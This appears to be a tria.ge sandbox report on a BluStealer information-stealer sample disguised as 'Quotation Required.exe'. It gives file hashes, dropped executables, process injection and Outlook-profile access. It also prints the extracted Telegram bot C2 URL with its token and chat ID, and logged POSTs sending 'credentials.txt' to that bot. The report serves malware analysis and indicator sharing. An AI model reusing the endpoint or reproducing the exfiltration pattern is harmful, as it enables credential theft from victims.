Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

Quotation ...ed.exe

windows7-x64

10

Quotation ...ed.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    145s
  • max time network
    140s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21/02/2023, 09:11 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Quotation Required.exe

  • Size

    501KB

  • MD5

    c6479e3bcb864d87e5d93ff06ed15c60

  • SHA1

    af08bbfe61178ee821e85b1f09be975b732387aa

  • SHA256

    9842d23cef4dc305ab6b8cd1ade477e1186d94cfd18861e1c87a55aff4d04c40

  • SHA512

    c5f4b4638b76b963fe8b731a08c43f67d5a8c512262755f78eca27feea5004e348e85a913926f8afe73accefa6a680bba37207adb37880100cd2f8ff6509b1b6

  • SSDEEP

    12288:/YmibSNNCgbjT5hg1s5PiA8C58tpxxqVTEp1B:/YmQoz5hgSN8tpxAVEp1B

Score
10/10
blustealercollectionstealer

Malware Config

Extracted

Family

blustealer

C2

https://api.telegram.org/bot5797428905:AAGaRRXGZN1d9GGFd3sE5x4uSpCGF0PU4m4/sendMessage?chat_id=1251788325

Signatures

  • BluStealer

    A Modular information stealer written in Visual Basic.

    stealerblustealer
  • Executes dropped EXE 2 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Quotation Required.exe
    "C:\Users\Admin\AppData\Local\Temp\Quotation Required.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3840
    • C:\Users\Admin\AppData\Local\Temp\lhiecmmdg.exe
      "C:\Users\Admin\AppData\Local\Temp\lhiecmmdg.exe" C:\Users\Admin\AppData\Local\Temp\ovcnaiorxn.d
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:4796
      • C:\Users\Admin\AppData\Local\Temp\lhiecmmdg.exe
        "C:\Users\Admin\AppData\Local\Temp\lhiecmmdg.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:3368
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
          4⤵
          • Accesses Microsoft Outlook profiles
          • outlook_office_path
          • outlook_win_path
          PID:3580

Network

  • flag-us
    DNS
    api.telegram.org
    lhiecmmdg.exe
    Remote address:
    8.8.8.8:53
    Request
    api.telegram.org
    IN A
    Response
    api.telegram.org
    IN A
    149.154.167.220
  • flag-nl
    POST
    https://api.telegram.org/bot5797428905:AAGaRRXGZN1d9GGFd3sE5x4uSpCGF0PU4m4/sendMessage
    lhiecmmdg.exe
    Remote address:
    149.154.167.220:443
    Request
    POST /bot5797428905:AAGaRRXGZN1d9GGFd3sE5x4uSpCGF0PU4m4/sendMessage HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Accept-Language: en-US
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Content-Length: 167
    Host: api.telegram.org
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Tue, 21 Feb 2023 09:12:13 GMT
    Content-Type: application/json
    Content-Length: 405
    Connection: keep-alive
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
  • flag-nl
    POST
    https://api.telegram.org/bot5797428905:AAGaRRXGZN1d9GGFd3sE5x4uSpCGF0PU4m4/sendDocument?chat_id=1251788325&caption=credentials.txt:::WEYPCEWN\Admin
    lhiecmmdg.exe
    Remote address:
    149.154.167.220:443
    Request
    POST /bot5797428905:AAGaRRXGZN1d9GGFd3sE5x4uSpCGF0PU4m4/sendDocument?chat_id=1251788325&caption=credentials.txt:::WEYPCEWN\Admin HTTP/1.1
    Accept: */*
    Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: api.telegram.org
    Content-Length: 201
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 400 Bad Request
    Server: nginx/1.18.0
    Date: Tue, 21 Feb 2023 09:12:14 GMT
    Content-Type: application/json
    Content-Length: 81
    Connection: keep-alive
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
  • flag-us
    DNS
    220.167.154.149.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    220.167.154.149.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    22.249.124.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    22.249.124.192.in-addr.arpa
    IN PTR
    Response
    22.249.124.192.in-addr.arpa
    IN PTR
    cloudproxy10022sucurinet
  • flag-us
    DNS
    203.151.224.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    203.151.224.20.in-addr.arpa
    IN PTR
    Response
  • 149.154.167.220:443
    https://api.telegram.org/bot5797428905:AAGaRRXGZN1d9GGFd3sE5x4uSpCGF0PU4m4/sendMessage
    tls, http
    lhiecmmdg.exe
    1.4kB
     7.1kB
     13
    12

    HTTP Request

    POST https://api.telegram.org/bot5797428905:AAGaRRXGZN1d9GGFd3sE5x4uSpCGF0PU4m4/sendMessage

    HTTP Response

    200
  • 149.154.167.220:443
    https://api.telegram.org/bot5797428905:AAGaRRXGZN1d9GGFd3sE5x4uSpCGF0PU4m4/sendDocument?chat_id=1251788325&caption=credentials.txt:::WEYPCEWN\Admin
    tls, http
    lhiecmmdg.exe
    1.8kB
     6.8kB
     16
    12

    HTTP Request

    POST https://api.telegram.org/bot5797428905:AAGaRRXGZN1d9GGFd3sE5x4uSpCGF0PU4m4/sendDocument?chat_id=1251788325&caption=credentials.txt:::WEYPCEWN\Admin

    HTTP Response

    400
  • 13.89.179.10:443
    322 B
     7
  • 93.184.221.240:80
    322 B
     7
  • 93.184.221.240:80
    322 B
     7
  • 93.184.221.240:80
    322 B
     7
  • 173.223.113.164:443
    322 B
     7
  • 173.223.113.131:80
    322 B
     7
  • 204.79.197.203:80
    322 B
     7
  • 8.8.8.8:53
    api.telegram.org
    dns
    lhiecmmdg.exe
    62 B
     78 B
     1
    1

    DNS Request

    api.telegram.org

    DNS Response

    149.154.167.220

  • 8.8.8.8:53
    220.167.154.149.in-addr.arpa
    dns
    74 B
     167 B
     1
    1

    DNS Request

    220.167.154.149.in-addr.arpa

  • 8.8.8.8:53
    22.249.124.192.in-addr.arpa
    dns
    73 B
     113 B
     1
    1

    DNS Request

    22.249.124.192.in-addr.arpa

  • 8.8.8.8:53
    203.151.224.20.in-addr.arpa
    dns
    73 B
     159 B
     1
    1

    DNS Request

    203.151.224.20.in-addr.arpa

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\lhiecmmdg.exe
    Filesize

    54KB

    MD5

    208f168a8a01e2d071375e09c084dc5a

    SHA1

    e04b395d08bfad73c65997e24f4fb951a7837d61

    SHA256

    0ea519809172240457a3d0bdb4dce19d0456670355ff1ead6d9823a1e72e433b

    SHA512

    10f05cac53cc143ce0388e8cd3546e856ed245f3999aca51d2db1e2efeacfb7dc5a18192280ebcb4087208a9cd50e90612150712eeed2c68c5876741bfa940cc

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\lhiecmmdg.exe
    Filesize

    54KB

    MD5

    208f168a8a01e2d071375e09c084dc5a

    SHA1

    e04b395d08bfad73c65997e24f4fb951a7837d61

    SHA256

    0ea519809172240457a3d0bdb4dce19d0456670355ff1ead6d9823a1e72e433b

    SHA512

    10f05cac53cc143ce0388e8cd3546e856ed245f3999aca51d2db1e2efeacfb7dc5a18192280ebcb4087208a9cd50e90612150712eeed2c68c5876741bfa940cc

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\lhiecmmdg.exe
    Filesize

    54KB

    MD5

    208f168a8a01e2d071375e09c084dc5a

    SHA1

    e04b395d08bfad73c65997e24f4fb951a7837d61

    SHA256

    0ea519809172240457a3d0bdb4dce19d0456670355ff1ead6d9823a1e72e433b

    SHA512

    10f05cac53cc143ce0388e8cd3546e856ed245f3999aca51d2db1e2efeacfb7dc5a18192280ebcb4087208a9cd50e90612150712eeed2c68c5876741bfa940cc

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\ovcnaiorxn.d
    Filesize

    5KB

    MD5

    162e0c2bbbccab38c10728759e5c96b7

    SHA1

    0f45df923464f98cc5f655af51f31f30646e164b

    SHA256

    8213a9356d16fc8d08625217bf8f5a95168bacf3dc1c0413820533f8a2aff10c

    SHA512

    0820e5ee0c3c2dacc596a8101a362ed53037c9560dc8b76d09db1798651cb1b09136e5438fb176cefb6fa81358bb3973a4ad05a2b61622453f5ed58beb17da20

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\zeylacft.exz
    Filesize

    460KB

    MD5

    df3d012d61af20771fd15c9b906051fa

    SHA1

    2cd498b119af9cac981fd2a12e55224b8481f1ac

    SHA256

    a5c41dc9d73516047db56803ce3837afb830f990d01dd497494e24215a5597ac

    SHA512

    d27e5ad78d500d2300800a0b0d9302dd0dfeb367f2d1f983645c440950795fe883acab1c5056ddfc35e08d4ddf1f008ee3cc718e914a0e6b03d21fb475b09bc2

    Download Submit

  • memory/3368-154-0x0000000000400000-0x000000000046E000-memory.dmp

    Filesize

    440KB

    Download

  • memory/3368-174-0x0000000000400000-0x000000000046E000-memory.dmp

    Filesize

    440KB

    Download

  • memory/3368-145-0x0000000000400000-0x000000000046E000-memory.dmp

    Filesize

    440KB

    Download

  • memory/3368-149-0x0000000000400000-0x000000000046E000-memory.dmp

    Filesize

    440KB

    Download

  • memory/3368-178-0x0000000000400000-0x000000000046E000-memory.dmp

    Filesize

    440KB

    Download

  • memory/3368-177-0x0000000000400000-0x000000000046E000-memory.dmp

    Filesize

    440KB

    Download

  • memory/3368-176-0x0000000000400000-0x000000000046E000-memory.dmp

    Filesize

    440KB

    Download

  • memory/3368-175-0x0000000000400000-0x000000000046E000-memory.dmp

    Filesize

    440KB

    Download

  • memory/3368-166-0x0000000000400000-0x000000000046E000-memory.dmp

    Filesize

    440KB

    Download

  • memory/3368-167-0x0000000000400000-0x000000000046E000-memory.dmp

    Filesize

    440KB

    Download

  • memory/3368-168-0x0000000000400000-0x000000000046E000-memory.dmp

    Filesize

    440KB

    Download

  • memory/3368-169-0x0000000000400000-0x000000000046E000-memory.dmp

    Filesize

    440KB

    Download

  • memory/3368-170-0x0000000000400000-0x000000000046E000-memory.dmp

    Filesize

    440KB

    Download

  • memory/3368-171-0x0000000000400000-0x000000000046E000-memory.dmp

    Filesize

    440KB

    Download

  • memory/3368-172-0x0000000000400000-0x000000000046E000-memory.dmp

    Filesize

    440KB

    Download

  • memory/3368-173-0x0000000000400000-0x000000000046E000-memory.dmp

    Filesize

    440KB

    Download

  • memory/3368-142-0x0000000000400000-0x000000000046E000-memory.dmp

    Filesize

    440KB

    Download

  • memory/3580-152-0x0000000004EE0000-0x0000000004F7C000-memory.dmp

    Filesize

    624KB

    Download

  • memory/3580-151-0x0000000004D40000-0x0000000004D50000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3580-150-0x0000000000760000-0x00000000007C6000-memory.dmp

    Filesize

    408KB

    Download

  • memory/4796-141-0x0000000000530000-0x0000000000532000-memory.dmp

    Filesize

    8KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.